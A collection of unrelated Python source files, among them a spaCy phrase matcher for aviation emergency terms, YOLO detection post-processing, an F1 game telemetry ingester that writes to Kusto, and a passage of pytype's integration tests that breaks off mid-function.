Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .Assignment import Assignment
from .Error import Error, ConfigurationError
from .FastTrips import FastTrips
from .Logger import FastTripsLogger, setupLogging
from .Passenger import Passenger
from .PathSet import PathSet
from .Performance import Performance
from .Route import Route
from .Run import run_fasttrips, main
from .Stop import Stop
from .TAZ import TAZ
from .Transfer import Transfer
from .Trip import Trip
from .Util import Util
__all__ = [
'Event',
'FastTrips',
'FastTripsLogger', 'setupLogging',
'Passenger',
'PathSet',
'Route',
'Run',
'Stop',
'TAZ',
'Trip',
]
|
nilq/baby-python
|
python
|
import spacy
nlp = spacy.load('en_core_web_sm')
from spacy.matcher import Matcher, PhraseMatcher
from spacy.tokens import Span
import string
from nltk.corpus import stopwords
import pandas as pd
def phrase_template():
'''
This function returns a list of all the possible technical terms that has high possibility of having several occurances in FAA handbooks and manuals,
or in manuals pertaining to aircraft procedures and emergency procedures.
This list is required to use the Phrase Matcher algoritm of matching the relations.
'''
phrases = ["emergency", "non-normal", " Federal Aviation Administration", "FAA", "Handbook", "emergency landings",
"engine", "emergency landing", "forced landing", "precautionary landing", "ditching", "fire",
"sink rate", "sink rate control", "attitude", "terrain selection", "safety concepts", "configuration",
"approach", "terrain types", "terrain", "confined areas", "trees", "forest", "water", "snow", "after takeoff",
"engine failure after takeoff", "single engine", "single-engine", "emergency descents", "in-flight", "in-flight fire",
"engine fire", "electrical fire", "electrical fires", "cabin fire", "asymmetric", "split", "asymmetric flap", "asymmetric (split) flap", "flap", "flaps",
"malfunction", "flight control malfunction", "flight control malfunctions", "flight control", "total flap failure", "total flaps failure",
"loss", "loss of elevator control", "elevator", "elevator control", "gear", "landing gear", "landing gear malfunction", "gears", "systems malfunction", "systems malfunctions",
"electrical", "electrical system", "pitot", "pitot-static", "pitot tube", "blocked", "blockage", "pitot-static system", "instrument operation", "pressure", "pressure chamber",
"stall", "speed", "vertical speed", "door", "door opening in-flight", "door opeining", "loss", "loss of rpm", "rpm", "loss of manifold pressure", "gain of manifold pressure", "high oil temperature",
"Inadvertent VFR Flight into IMC", "VFR Flight", "VFR", "control", "maintaining", "airplane control", "maintaining airplane control",
"attitude", "attitude indicator", "attitude control", "turns", "spiral", "graveyard spiral", "instabaility", "steep", "banks", "steep banks", "climbs", "descents", "maneuvers", "visual flight",
"extend", "retract", "extension", "retraction", "non-instrument-rated", "pilot", "psychological hazards", "nose", "flying speed", "landing area", "throttle", "runway", "minimum", "touchdown", "glide",
"damage", "groundspeed", "wind", "deceleration", "hydraulics", "hydraulic", "door", "opening", "spiral", "descent", "EFIS", "avionics", "IFR", "propellor", "thrust", "oil temperature", "oil pressure", "fuel pressure",
"displays", "flight display", "cowl", "stall", "stall warning", "stall warning horn", "engines", "fuel", "fuel leak", "fuel shortage", "fuel tank", "fuel supply", "fuel selector", ]
return phrases
def entity_pair(sent):
'''
The subject and the object is extracted from the sentence passed into the function.
'''
ent1 = ""
ent2 = ""
prev_token_dep = ""
prev_token_text = ""
prefix = ""
modifier = ""
for token in nlp(sent):
if token.dep_ != "punct":
if token.dep_ == "compound":
prefix = token.text
if prev_token_dep == "compound":
prefix = prev_token_text + " "+ token.text
if token.dep_.endswith("mod") == True:
modifier = token.text
if prev_token_dep == "compound":
modifier = prev_token_text + " "+ token.text
if token.dep_.find("subj") == True:
ent1 = modifier +" "+ prefix + " "+ token.text
prefix = ""
modifier = ""
prev_token_dep = ""
prev_token_text = ""
if token.dep_.find("obj") == True:
ent2 = modifier +" "+ prefix +" "+ token.text
prev_token_dep = token.dep_
prev_token_text = token.text
return [ent1.strip(), ent2.strip()]
def get_relation(sent):
'''
Relations are identified and matched in each sentence
'''
doc = nlp(sent)
matcher = PhraseMatcher(nlp.vocab)
pattern = list(nlp.tokenizer.pipe(phrase_template()))
matcher.add("matching_1", None, *pattern)
matches = matcher(doc)
k = len(matches) - 1
span = doc
for match_id, start, end in matches:
span = doc[start:end]
return(span.text)
def cleanup_text(docs, logging=False):
'''
The text loaded from the PDF is cleaned and lemmatized. Entities such as Punctuations, stop words, pronouns etc are removed
'''
texts = []
counter = 1
for doc in docs:
if counter % 1000 == 0 and logging:
print("Processed %d out of %d documents." % (counter, len(docs)))
counter += 1
doc = nlp(doc, disable=['parser', 'ner'])
tokens = [tok.lemma_.lower().strip() for tok in doc if tok.lemma_ != '-PRON-']
tokens = [tok for tok in tokens if tok not in stopwords.words('english') and tok not in string.punctuation]
tokens = ' '.join(tokens)
texts.append(tokens)
return pd.Series(texts)
|
nilq/baby-python
|
python
|
# Import the agent class
#from .agenttemplate import AgentTemplate
|
nilq/baby-python
|
python
|
# Copyright © 2020 Arm Ltd and Contributors. All rights reserved.
# SPDX-License-Identifier: MIT
"""
Contains functions specific to decoding and processing inference results for YOLO V3 Tiny models.
"""
import cv2
import numpy as np
def iou(box1: list, box2: list):
"""
Calculates the intersection-over-union (IoU) value for two bounding boxes.
Args:
box1: Array of positions for first bounding box
in the form [x_min, y_min, x_max, y_max].
box2: Array of positions for second bounding box.
Returns:
Calculated intersection-over-union (IoU) value for two bounding boxes.
"""
area_box1 = (box1[2] - box1[0]) * (box1[3] - box1[1])
area_box2 = (box2[2] - box2[0]) * (box2[3] - box2[1])
if area_box1 <= 0 or area_box2 <= 0:
iou_value = 0
else:
y_min_intersection = max(box1[1], box2[1])
x_min_intersection = max(box1[0], box2[0])
y_max_intersection = min(box1[3], box2[3])
x_max_intersection = min(box1[2], box2[2])
area_intersection = max(0, y_max_intersection - y_min_intersection) *\
max(0, x_max_intersection - x_min_intersection)
area_union = area_box1 + area_box2 - area_intersection
try:
iou_value = area_intersection / area_union
except ZeroDivisionError:
iou_value = 0
return iou_value
def yolo_processing(output: np.ndarray, confidence_threshold=0.40, iou_threshold=0.40):
"""
Performs non-maximum suppression on input detections. Any detections
with IOU value greater than given threshold are suppressed.
Args:
output: Vector of outputs from network.
confidence_threshold: Selects only strong detections above this value.
iou_threshold: Filters out boxes with IOU values above this value.
Returns:
A list of detected objects in the form [class, [box positions], confidence]
"""
if len(output) != 1:
raise RuntimeError('Number of outputs from YOLO model does not equal 1')
# Find the array index of detections with confidence value above threshold
confidence_det = output[0][:, :, 4][0]
detections = list(np.where(confidence_det > confidence_threshold)[0])
all_det, nms_det = [], []
# Create list of all detections above confidence threshold
for d in detections:
box_positions = list(output[0][:, d, :4][0])
confidence_score = output[0][:, d, 4][0]
class_idx = np.argmax(output[0][:, d, 5:])
all_det.append((class_idx, box_positions, confidence_score))
# Suppress detections with IOU value above threshold
while all_det:
element = int(np.argmax([all_det[i][2] for i in range(len(all_det))]))
nms_det.append(all_det.pop(element))
all_det = [*filter(lambda x: (iou(x[1], nms_det[-1][1]) <= iou_threshold), [det for det in all_det])]
return nms_det
def yolo_resize_factor(video: cv2.VideoCapture, input_binding_info: tuple):
"""
Gets a multiplier to scale the bounding box positions to
their correct position in the frame.
Args:
video: Video capture object, contains information about data source.
input_binding_info: Contains shape of model input layer.
Returns:
Resizing factor to scale box coordinates to output frame size.
"""
frame_height = video.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_width = video.get(cv2.CAP_PROP_FRAME_WIDTH)
model_height, model_width = list(input_binding_info[1].GetShape())[1:3]
return max(frame_height, frame_width) / max(model_height, model_width)
|
nilq/baby-python
|
python
|
from xml.etree.ElementTree import tostring
from f1_telemetry.server import get_telemetry
from kusto.ingest import ingest_kusto
from datetime import datetime
batch_freq_high = 9 # 20 cars per packet * batch_freq_high(x) packets
batch_freq_low = 2
ingest_cartelemetrydataCnt = 0
ingest_cartelemetryBuffer = ""
ingest_sessiondataCnt = 0
ingest_sessiondataBuffer = ""
ingest_lapdataCnt = 0
ingest_lapdataBuffer =""
ingest_carstatusdataCnt =0
ingest_carstatusdataBuffer=""
def ingest_cartelemetrydata(packet, m_header):
#print ("car telemetry length..", len(packet.m_carTelemetryData))
global ingest_cartelemetryBuffer
global ingest_cartelemetrydataCnt
#print ("SUID ", m_header.m_sessionUID)
for idx,cartelemetrydata in enumerate(packet.m_carTelemetryData):
data = [
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
idx,
cartelemetrydata.m_speed,
cartelemetrydata.m_throttle,
cartelemetrydata.m_steer,
cartelemetrydata.m_brake,
cartelemetrydata.m_clutch,
cartelemetrydata.m_gear,
cartelemetrydata.m_engineRPM,
cartelemetrydata.m_drs,
cartelemetrydata.m_revLightsPercent,
'', #cartelemetrydata.m_brakesTemperature fix parse issue
cartelemetrydata.m_tyresSurfaceTemperature[0],
cartelemetrydata.m_tyresSurfaceTemperature[1],
cartelemetrydata.m_tyresSurfaceTemperature[2],
cartelemetrydata.m_tyresSurfaceTemperature[3],
cartelemetrydata.m_tyresInnerTemperature[0],
cartelemetrydata.m_tyresInnerTemperature[1],
cartelemetrydata.m_tyresInnerTemperature[2],
cartelemetrydata.m_tyresInnerTemperature[3],
cartelemetrydata.m_engineTemperature,
cartelemetrydata.m_tyresPressure[0],
cartelemetrydata.m_tyresPressure[1],
cartelemetrydata.m_tyresPressure[2],
cartelemetrydata.m_tyresPressure[3],
cartelemetrydata.m_surfaceType[0],
cartelemetrydata.m_surfaceType[1],
cartelemetrydata.m_surfaceType[2],
cartelemetrydata.m_surfaceType[3]
]
ingest_cartelemetryBuffer += ','.join(map(str, data))
ingest_cartelemetryBuffer +="\n"
if ingest_cartelemetrydataCnt == batch_freq_high:
#print(ingest_cartelemetryBuffer)
ingest_kusto("CarTelemetry", ingest_cartelemetryBuffer )
ingest_cartelemetryBuffer=""
ingest_cartelemetrydataCnt=0
else:
ingest_cartelemetrydataCnt+=1
def ingest_sessiondata(sessiondatapacket, m_header):
global ingest_sessiondataBuffer
global ingest_sessiondataCnt
data =[
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
sessiondatapacket.m_weather,
sessiondatapacket.m_trackTemperature,
sessiondatapacket.m_airTemperature,
sessiondatapacket.m_totalLaps,
sessiondatapacket.m_trackId,
sessiondatapacket.m_trackLength,
sessiondatapacket.m_sessionType,
sessiondatapacket.m_sessionDuration,
sessiondatapacket.m_sessionTimeLeft
]
ingest_sessiondataBuffer = ','.join(map(str, data))
ingest_sessiondataBuffer +="\n"
if ingest_sessiondataCnt == batch_freq_low:
ingest_kusto("Session", ingest_sessiondataBuffer )
# print(ingest_sessiondataBuffer)
ingest_sessiondataBuffer=""
ingest_sessiondataCnt=0
else:
ingest_sessiondataCnt+=1
def ingest_participantdata(packet, m_header):
participantdataBuffer=""
for idx, participantdata in enumerate(packet.m_participants):
data =[
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
idx,
packet.m_numActiveCars,
participantdata.m_aiControlled,
participantdata.m_driverId,
participantdata.m_teamId,
participantdata.m_raceNumber,
participantdata.m_nationality,
participantdata.m_name.decode()
]
participantdataBuffer += ','.join(map(str, data))
participantdataBuffer+="\n"
#print(participantdataBuffer)
ingest_kusto("Participant", participantdataBuffer)
def ingest_lapdata(packet, m_header):
global ingest_lapdataBuffer
global ingest_lapdataCnt
for idx,lapdata in enumerate(packet.m_lapsData):
data = [
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
idx,
lapdata.m_lastLapTime,
lapdata.m_currentLapTime,
lapdata.m_bestLapTime,
lapdata.m_carPosition,
lapdata.m_currentLapNum,
lapdata.m_currentLapInvalid,
lapdata.m_lapDistance,
lapdata.m_totalDistance,
lapdata.m_gridPosition,
lapdata.m_pitStatus,
lapdata.m_penalties,
lapdata.m_driverStatus,
lapdata.m_resultStatus
]
ingest_lapdataBuffer += ','.join(map(str, data))
ingest_lapdataBuffer +="\n"
if ingest_lapdataCnt == batch_freq_high:
#print(ingest_lapdataBuffer)
ingest_kusto("Lap", ingest_lapdataBuffer )
ingest_lapdataBuffer=""
ingest_lapdataCnt=0
else:
ingest_lapdataCnt+=1
def ingest_carstatusdata(packet, m_header):
global ingest_carstatusdataBuffer
global ingest_carstatusdataCnt
for idx,carstatusdata in enumerate(packet.m_carStatusData):
data = [
datetime.utcnow(),
m_header.m_sessionUID,
m_header.m_frameIdentifier,
m_header.m_sessionTime,
m_header.m_playerCarIndex,
idx,
carstatusdata.m_tractionControl,
carstatusdata.m_antiLockBrakes,
carstatusdata.m_fuelMix,
carstatusdata.m_fuelInTank,
carstatusdata.m_fuelCapacity,
carstatusdata.m_fuelRemainingLaps,
carstatusdata.m_maxRPM,
carstatusdata.m_idleRPM,
carstatusdata.m_maxGears,
carstatusdata.m_drsAllowed,
carstatusdata.m_tyresWear[0],
carstatusdata.m_tyresWear[1],
carstatusdata.m_tyresWear[2],
carstatusdata.m_tyresWear[3],
carstatusdata.m_actualTyreCompound,
carstatusdata.m_tyreVisualCompound,
carstatusdata.m_tyresDamage[0],
carstatusdata.m_tyresDamage[1],
carstatusdata.m_tyresDamage[2],
carstatusdata.m_tyresDamage[3],
carstatusdata.m_frontLeftWingDamage,
carstatusdata.m_frontRightWingDamage,
carstatusdata.m_rearWingDamage,
carstatusdata.m_engineDamage,
carstatusdata.m_gearBoxDamage,
carstatusdata.m_vehicleFiaFlags
]
ingest_carstatusdataBuffer += ','.join(map(str, data))
ingest_carstatusdataBuffer +="\n"
if ingest_carstatusdataCnt == batch_freq_high:
#print(ingest_carstatusdataBuffer)
ingest_kusto("CarStatus", ingest_carstatusdataBuffer )
ingest_carstatusdataBuffer=""
ingest_carstatusdataCnt=0
else:
ingest_carstatusdataCnt+=1
if __name__ == '__main__':
print("Server started on 20777")
for packet, theader, m_header, player in get_telemetry():
#print(theader, packet)
if theader == 0: #PacketMotionData
""" print(theader, packet.m_wheelSpeed[0], packet.m_wheelSpeed[1],
packet.m_wheelSpeed[2], packet.m_wheelSpeed[3])
"""
elif theader == 1: #PacketSessionData
ingest_sessiondata(packet, m_header)
elif theader == 2:
ingest_lapdata(packet, m_header)
elif theader == 3:
print(dir(packet.m_eventStringCode))
print(theader, "Event ID: ", packet.m_eventStringCode._type_)
elif theader == 4:
#print("ID: ", theader)
ingest_participantdata(packet,m_header)
elif theader == 5:
""" for setupdata in packet.m_carSetups:
print(theader, "Front Wing: ", setupdata.m_frontWing,
"Rear Wing: ", setupdata.m_rearWing,
"Differential on throttle: ", setupdata.m_onThrottle,
"Differential off throttle: ", setupdata.m_offThrottle,
"Front camber: ", setupdata.m_frontCamber,
"Rear camber: ", setupdata.m_rearCamber,
"Front toe: ", setupdata.m_frontToe,
"Rear toe: ", setupdata.m_rearToe,
"Front suspension: ", setupdata.m_frontSuspension,
"Rear suspension: ", setupdata.m_rearSuspension,
"Front bar: ", setupdata.m_frontAntiRollBar,
"Rear bar: ", setupdata.m_rearAntiRollBar,
"Front height: ", setupdata.m_frontSuspensionHeight,
"Rear height: ", setupdata.m_rearSuspensionHeight,
"Brake pressure (%): ", setupdata.m_brakePressure,
"Brake bias (%): ", setupdata.m_brakeBias,
"Front tyre (PSI): ", setupdata.m_frontTyrePressure,
"Rear tyre (PSI): ", setupdata.m_rearTyrePressure,
"Ballast: ", setupdata.m_ballast,
"Fuel Load: ", setupdata.m_fuelLoad)
"""
elif theader == 6:
ingest_cartelemetrydata(packet, m_header)
elif theader == 7:
ingest_carstatusdata(packet, m_header)
|
nilq/baby-python
|
python
|
"""Integration test for pytype."""
from __future__ import print_function
import csv
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
import textwrap
from pytype import config
from pytype import main as main_module
from pytype import utils
from pytype.pyi import parser
from pytype.pytd import pytd_utils
from pytype.pytd import typeshed
from pytype.pytd.parse import builtins
from pytype.tests import test_base
import unittest
class PytypeTest(unittest.TestCase):
"""Integration test for pytype."""
PYTHON_VERSION = (2, 7)
DEFAULT_PYI = builtins.DEFAULT_SRC
INCLUDE = object()
@classmethod
def setUpClass(cls):
super(PytypeTest, cls).setUpClass()
cls.pytype_dir = os.path.dirname(os.path.dirname(parser.__file__))
def setUp(self):
super(PytypeTest, self).setUp()
self._ResetPytypeArgs()
self.tmp_dir = tempfile.mkdtemp()
self.errors_csv = os.path.join(self.tmp_dir, "errors.csv")
def tearDown(self):
super(PytypeTest, self).tearDown()
shutil.rmtree(self.tmp_dir)
def _ResetPytypeArgs(self):
self.pytype_args = {
"--python_version": utils.format_version(self.PYTHON_VERSION),
"--verbosity": 1
}
def _DataPath(self, filename):
if os.path.dirname(filename) == self.tmp_dir:
return filename
return os.path.join(self.pytype_dir, "test_data/", filename)
def _TmpPath(self, filename):
return os.path.join(self.tmp_dir, filename)
def _MakePyFile(self, contents):
if utils.USE_ANNOTATIONS_BACKPORT:
contents = test_base.WithAnnotationsImport(contents)
return self._MakeFile(contents, extension=".py")
def _MakeFile(self, contents, extension):
contents = textwrap.dedent(contents)
path = self._TmpPath(
hashlib.md5(contents.encode("utf-8")).hexdigest() + extension)
with open(path, "w") as f:
print(contents, file=f)
return path
def _RunPytype(self, pytype_args_dict):
"""A single command-line call to the pytype binary.
Typically you'll want to use _CheckTypesAndErrors or
_InferTypesAndCheckErrors, which will set up the command-line arguments
properly and check that the errors file is in the right state after the
call. (The errors check is bundled in to avoid the user forgetting to call
assertHasErrors() with no arguments when expecting no errors.)
Args:
pytype_args_dict: A dictionary of the arguments to pass to pytype, minus
the binary name. For example, to run
pytype simple.py --output=-
the arguments should be {"simple.py": self.INCLUDE, "--output": "-"}
"""
pytype_exe = os.path.join(self.pytype_dir, "pytype")
pytype_args = [pytype_exe]
for arg, value in pytype_args_dict.items():
if value is not self.INCLUDE:
arg += "=" + str(value)
pytype_args.append(arg)
p = subprocess.Popen(
pytype_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.stdout, self.stderr = (s.decode("utf-8") for s in p.communicate())
self.returncode = p.returncode
def _ParseString(self, string):
"""A wrapper for parser.parse_string that inserts the python version."""
return parser.parse_string(string, python_version=self.PYTHON_VERSION)
def _GenerateBuiltinsTwice(self, python_version):
os.environ["PYTHONHASHSEED"] = "0"
f1 = self._TmpPath("builtins1.pickle")
f2 = self._TmpPath("builtins2.pickle")
for f in (f1, f2):
self.pytype_args["--generate-builtins"] = f
self.pytype_args["--python_version"] = python_version
self._RunPytype(self.pytype_args)
return f1, f2
def assertBuiltinsPickleEqual(self, f1, f2):
with open(f1, "rb") as pickle1, open(f2, "rb") as pickle2:
if pickle1.read() == pickle2.read():
return
out1 = pytd_utils.LoadPickle(f1, compress=True)
out2 = pytd_utils.LoadPickle(f2, compress=True)
raise AssertionError("\n".join(pytd_utils.DiffNamedPickles(out1, out2)))
def assertOutputStateMatches(self, **has_output):
"""Check that the output state matches expectations.
If, for example, you expect the program to print something to stdout and
nothing to stderr before exiting with an error code, you would write
assertOutputStateMatches(stdout=True, stderr=False, returncode=True).
Args:
**has_output: Whether each output type should have output.
"""
output_types = {"stdout", "stderr", "returncode"}
assert len(output_types) == len(has_output)
for output_type in output_types:
output_value = getattr(self, output_type)
if has_output[output_type]:
self.assertTrue(output_value, output_type + " unexpectedly empty")
else:
value = str(output_value)
if len(value) > 50:
value = value[:47] + "..."
self.assertFalse(
output_value, "Unexpected output to %s: %r" % (output_type, value))
def assertHasErrors(self, *expected_errors):
with open(self.errors_csv, "r") as f:
errors = list(csv.reader(f, delimiter=","))
num, expected_num = len(errors), len(expected_errors)
try:
self.assertEqual(num, expected_num,
"Expected %d errors, got %d" % (expected_num, num))
for error, expected_error in zip(errors, expected_errors):
self.assertEqual(expected_error, error[2],
"Expected %r, got %r" % (expected_error, error[2]))
except:
print("\n".join(" | ".join(error) for error in errors), file=sys.stderr)
raise
def _SetUpChecking(self, filename):
self.pytype_args[self._DataPath(filename)] = self.INCLUDE
self.pytype_args["--check"] = self.INCLUDE
def _CheckTypesAndErrors(self, filename, expected_errors):
self._SetUpChecking(filename)
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertHasErrors(*expected_errors)
def _InferTypesAndCheckErrors(self, filename, expected_errors):
self.pytype_args[self._DataPath(filename)] = self.INCLUDE
self.pytype_args["--output"] = "-"
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
self.assertHasErrors(*expected_errors)
def assertInferredPyiEquals(self, expected_pyi=None, filename=None):
assert bool(expected_pyi) != bool(filename)
if filename:
with open(self._DataPath(filename), "r") as f:
expected_pyi = f.read()
message = ("\n==Expected pyi==\n" + expected_pyi +
"\n==Actual pyi==\n" + self.stdout)
self.assertTrue(self._ParseString(self.stdout).ASTeq(
self._ParseString(expected_pyi)), message)
def GeneratePickledSimpleFile(self, pickle_name, verify_pickle=True):
pickled_location = os.path.join(self.tmp_dir, pickle_name)
self.pytype_args["--pythonpath"] = self.tmp_dir
self.pytype_args["--pickle-output"] = self.INCLUDE
self.pytype_args["--module-name"] = "simple"
if verify_pickle:
self.pytype_args["--verify-pickle"] = self.INCLUDE
self.pytype_args["--output"] = pickled_location
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=0)
self.assertTrue(os.path.exists(pickled_location))
return pickled_location
def testPickledFileStableness(self):
# Tests that the pickled format is stable under a constant PYTHONHASHSEED.
l_1 = self.GeneratePickledSimpleFile("simple1.pickled")
l_2 = self.GeneratePickledSimpleFile("simple2.pickled")
with open(l_1, "rb") as f_1:
with open(l_2, "rb") as f_2:
self.assertEqual(f_1.read(), f_2.read())
def testGeneratePickledAst(self):
self.GeneratePickledSimpleFile("simple.pickled", verify_pickle=True)
def testGenerateUnverifiedPickledAst(self):
self.GeneratePickledSimpleFile("simple.pickled", verify_pickle=False)
def testPickleNoOutput(self):
self.pytype_args["--pickle-output"] = self.INCLUDE
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testPickleBadOutput(self):
self.pytype_args["--pickle-output"] = self.INCLUDE
self.pytype_args["--output"] = os.path.join(self.tmp_dir, "simple.pyi")
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testBadVerifyPickle(self):
self.pytype_args["--verify-pickle"] = self.INCLUDE
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testNonexistentOption(self):
self.pytype_args["--rumpelstiltskin"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCfgTypegraphConflict(self):
self._SetUpChecking("simple.py")
output_path = self._TmpPath("simple.svg")
self.pytype_args["--output-cfg"] = output_path
self.pytype_args["--output-typegraph"] = output_path
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCheckInferConflict(self):
self.pytype_args["--check"] = self.INCLUDE
self.pytype_args["--output"] = "-"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testCheckInferConflict2(self):
self.pytype_args["--check"] = self.INCLUDE
self.pytype_args["input.py:output.pyi"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testInputOutputPair(self):
self.pytype_args[self._DataPath("simple.py") +":-"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
self.assertInferredPyiEquals(filename="simple.pyi")
def testMultipleOutput(self):
self.pytype_args["input.py:output1.pyi"] = self.INCLUDE
self.pytype_args["--output"] = "output2.pyi"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsInputConflict(self):
self.pytype_args["--generate-builtins"] = "builtins.py"
self.pytype_args["input.py"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsPythonpathConflict(self):
self.pytype_args["--generate-builtins"] = "builtins.py"
self.pytype_args["--pythonpath"] = "foo:bar"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testGenerateBuiltinsPy2(self):
self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.py")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testGenerateBuiltinsPy3(self):
self.pytype_args["--generate-builtins"] = self._TmpPath("builtins.py")
self.pytype_args["--python_version"] = "3.6"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testMissingInput(self):
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testMultipleInput(self):
self.pytype_args["input1.py"] = self.INCLUDE
self.pytype_args["input2.py"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testBadInputFormat(self):
self.pytype_args["input.py:output.pyi:rumpelstiltskin"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testPytypeErrors(self):
self._SetUpChecking("bad.py")
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
self.assertIn("[unsupported-operands]", self.stderr)
self.assertIn("[name-error]", self.stderr)
def testPytypeErrorsCsv(self):
self._SetUpChecking("bad.py")
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
self.assertHasErrors("unsupported-operands", "name-error")
def testPytypeErrorsNoReport(self):
self._SetUpChecking("bad.py")
self.pytype_args["--no-report-errors"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testPytypeReturnSuccess(self):
self._SetUpChecking("bad.py")
self.pytype_args["--return-success"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=False)
self.assertIn("[unsupported-operands]", self.stderr)
self.assertIn("[name-error]", self.stderr)
def testCompilerError(self):
self._CheckTypesAndErrors("syntax.py", ["python-compiler-error"])
def testMultiLineStringTokenError(self):
self._CheckTypesAndErrors("tokenerror1.py", ["python-compiler-error"])
def testMultiLineStatementTokenError(self):
self._CheckTypesAndErrors("tokenerror2.py", ["python-compiler-error"])
def testComplex(self):
self._CheckTypesAndErrors("complex.py", [])
def testCheck(self):
self._CheckTypesAndErrors("simple.py", [])
def testReturnType(self):
self._CheckTypesAndErrors(self._MakePyFile("""\
def f() -> int:
return "foo"
"""), ["bad-return-type"])
def testUsageError(self):
self._SetUpChecking(self._MakePyFile("""\
def f():
pass
"""))
# Set up a python version mismatch
self.pytype_args["--python_version"] = "3.4"
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=True, returncode=True)
def testSkipFile(self):
filename = self._MakePyFile("""\
# pytype: skip-file
""")
self.pytype_args[self._DataPath(filename)] = self.INCLUDE
self.pytype_args["--output"] = "-"
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=True, stderr=False, returncode=False)
self.assertInferredPyiEquals(expected_pyi=self.DEFAULT_PYI)
def testInfer(self):
self._InferTypesAndCheckErrors("simple.py", [])
self.assertInferredPyiEquals(filename="simple.pyi")
def testInferPytypeErrors(self):
self._InferTypesAndCheckErrors(
"bad.py", ["unsupported-operands", "name-error"])
self.assertInferredPyiEquals(filename="bad.pyi")
def testInferCompilerError(self):
self._InferTypesAndCheckErrors("syntax.py", ["python-compiler-error"])
self.assertInferredPyiEquals(expected_pyi=self.DEFAULT_PYI)
def testInferComplex(self):
self._InferTypesAndCheckErrors("complex.py", [])
self.assertInferredPyiEquals(filename="complex.pyi")
def testCheckMain(self):
self._SetUpChecking(self._MakePyFile("""\
def f():
name_error
def g():
"".foobar
g()
"""))
self.pytype_args["--main"] = self.INCLUDE
self.pytype_args["--output-errors-csv"] = self.errors_csv
self._RunPytype(self.pytype_args)
self.assertHasErrors("attribute-error")
def testInferToFile(self):
self.pytype_args[self._DataPath("simple.py")] = self.INCLUDE
pyi_file = self._TmpPath("simple.pyi")
self.pytype_args["--output"] = pyi_file
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
with open(pyi_file, "r") as f:
pyi = f.read()
with open(self._DataPath("simple.pyi"), "r") as f:
expected_pyi = f.read()
self.assertTrue(self._ParseString(pyi).ASTeq(
self._ParseString(expected_pyi)))
def testParsePyi(self):
self.pytype_args[self._DataPath("complex.pyi")] = self.INCLUDE
self.pytype_args["--parse-pyi"] = self.INCLUDE
self._RunPytype(self.pytype_args)
self.assertOutputStateMatches(stdout=False, stderr=False, returncode=False)
def testPytree(self):
"""Test pytype on a real-world program."""
self.pytype_args["--quick"] = self.INCLUDE
self._InferTypesAndCheckErrors("pytree.py", [
"import-error", "import-error", "attribute-error", "attribute-error",
"attribute-error", "name-error"])
ast = self._ParseString(self.stdout)
